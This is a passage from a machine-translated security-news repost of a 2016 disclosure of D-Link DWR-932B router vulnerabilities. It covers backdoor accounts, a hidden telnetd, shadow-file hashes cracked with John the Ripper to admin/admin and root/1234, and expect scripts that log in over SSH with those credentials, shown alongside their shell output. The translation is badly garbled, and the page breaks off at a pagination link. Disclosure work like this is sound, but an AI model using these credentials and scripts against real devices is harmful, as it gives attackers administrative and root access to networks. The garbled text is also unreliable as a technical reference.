Dlink DWR-932B router is explosion multiple security vulnerabilities-vulnerability warning-the black bar safety net

2016-10-08T00:00:00
ID MYHACK58:62201679928
Type myhack58
Reporter 佚名
Modified 2016-10-08T00:00:00

Description

Foreword According to security experts the latest discovery, the Dlink DWR-932B router in the presence of a large number of security vulnerabilities, including back doors, the back door account, the weak WPS, as well as a remote code execution vulnerability and so on. If you're on IOT Security aspects of interest, you can choose to get this router to practice your hand. Vulnerability overview Dlink DWR-932B router is a LTE router, since this Router the overall design there is a very serious problem, resulting in the device in the presence of a large number of security vulnerabilities. Dlink is a multinational network equipment manufacturers, and this router has now been sold to the worldwide countries and regions. Note that this device is now working for multinational businesses and organizations to provide Internet service, so these vulnerabilities will be related to businesses placed in a security risk. According to security research specialist description of Dlink DWR-932B router in a core functional module is based on the Quanta LTE router module to achieve. And unfortunately, this module not only from the Quanta LTE router inherited its communication function, but also will be one of the security vulnerabilities brought to the Dlink DWR-932B router body. Dlink DWR-932B router in the presence of the security vulnerability is as follows: -Back door account -The back door -The default WPS PIN code -Weak WPS PIN code generated -Leak No-IP account -HTTP daemon process qmiweb in the presence of multiple vulnerabilities -Remote FOTA -Security practices the presence of defects -UPnP security issue In the next vulnerability analysis and testing process, we are using the latest version of official firmware(firmware DWR-932_fw_revB_2_02_eu_en_20150709.zip, Module Version B, /Share3/DailyBuild/QDX_DailyBuild/QDT_2031_DLINK/QDT_2031_OS/source/LINUX/apps_proc/oe-core/build/tmp-eglibc/sysroots/x86_64-linux/usr/bin/armv7a-vfp-neon-oe-linux-gnueabi/arm-oe-linux-gnueabi-gcc) on. Security experts point of view: if you are a positive and optimistic person, then you can assume that these vulnerabilities exist is by the manufacturer's negligence caused. If you are a conspiracy theorist, then you can also think of these vulnerabilities is a manufacturer deliberately design. This article is not all discovered vulnerabilities related to disclosure out, we in this article only some of which affected more serious security vulnerabilities are analyzed. Note that, currently this router is still on sale. ! Since manufacturers are currently also not provided to the user with the Security Update Patch, so these vulnerabilities are still unable to be fixed. If the majority of users have any questions about this, you can try with your local D-Link service point of contact. Vulnerability details analysis-Backdoor account By default, the telnetd and SSHd both the service program will be in the router running. Note that, even if the router apparatus does not provide any information about the telnetd program documents and information, the service program will still be in the router, run: user@kali:~$ cat ./ etc/init. d/start_appmgr

[...]

Sandro { for telnetd debug...

start-stop-daemon-S-b-a /bin/logmaster

if [ -e /config2/telnetd ]; then

start-stop-daemon-S-b-a /sbin/telnetd

fi

Sandro }

[...] Security research experts in this router found two Backdoor account the attacker or can be use these two the back door account to bypass the router's HTTP authentication mechanism, and access to the router's administrative privileges. admin@homerouter:~$ grep admin /etc/passwd admin:htEcF9TWn./ 9Q:1 6 8:1 6 8:admin:/:/bin/sh admin@homerouter:~$ In IDA with the help of researchers in the“/bin/appmgr”found in your router's administrator account. The device's administrator account by default is“admin”and the password is also“admin”. ! About the root user the information as shown below: user@kali:~$ cat ./ etc/shadow root:aRDiHrJ0OkehM:1 6 2 7 0:0:9 9 9 9 9:7::: daemon::1 6 2 7 0:0:9 9 9 9 9:7::: bin::1 6 2 7 0:0:9 9 9 9 9:7::: sys::1 6 2 7 0:0:9 9 9 9 9:7::: sync::1 6 2 7 0:0:9 9 9 9 9:7::: games::1 6 2 7 0:0:9 9 9 9 9:7::: man::1 6 2 7 0:0:9 9 9 9 9:7::: lp::1 6 2 7 0:0:9 9 9 9 9:7::: mail::1 6 2 7 0:0:9 9 9 9 9:7::: news::1 6 2 7 0:0:9 9 9 9 9:7::: uucp::1 6 2 7 0:0:9 9 9 9 9:7::: proxy::1 6 2 7 0:0:9 9 9 9 9:7::: www-data::1 6 2 7 0:0:9 9 9 9 9:7::: backup::1 6 2 7 0:0:9 9 9 9 9:7::: list::1 6 2 7 0:0:9 9 9 9 9:7::: irc::1 6 2 7 0:0:9 9 9 9 9:7::: gnats::1 6 2 7 0:0:9 9 9 9 9:7::: diag::1 6 2 7 0:0:9 9 9 9 9:7::: nobody::1 6 2 7 0:0:9 9 9 9 9:7::: messagebus:!: 1 6 2 7 0:0:9 9 9 9 9:7::: avahi:!: 1 6 2 7 0:0:9 9 9 9 9:7::: admin@kali:~$ Use a hash to crack the artifact John The Ripper to crack the obtain to the password hash: user@kali:~$ john-show shadow+passwd admin:admin:admin:/:/bin/sh root:1 2 3 4:1 6 2 7 0:0:9 9 9 9 9:7:::

2 password hashes cracked, 0 left user@kali:~$ Results of the analysis are as follows: -the admin account password is“admin” -the root account password is“1 2 3 4” Use the admin Account to complete exploit instead of a program, for reference only [the portal] is: the user@kali:~$ cat quanta-ssh-default-password-admin

!/ usr/bin/expect-f

set timeout 3 spawn ssh admin@192.168.1.1 expect "password: $" send "admin\r" interact user@kali:~$ ./ quanta-ssh-default-password-admin spawn ssh admin@192.168.1.1 admin@192.168.1.1's password: admin@homerouter:~$ id uid=1 6 8(admin) gid=1 6 8(admin) groups=1 6 8(admin) admin@homerouter:~$ Use the root account to complete the exploit: a substitute program, for reference only [the portal] is: the user@kali:~$ cat quanta-ssh-default-password-root

!/ usr/bin/expect-f

set timeout 3 spawn ssh root@192.168.1.1 expect "password: $" send "1 2 3 4\r" interact user@kali:~$ ./ quanta-ssh-default-password-root

[1] [2] [3] [4] [5] [6] [7] [8] next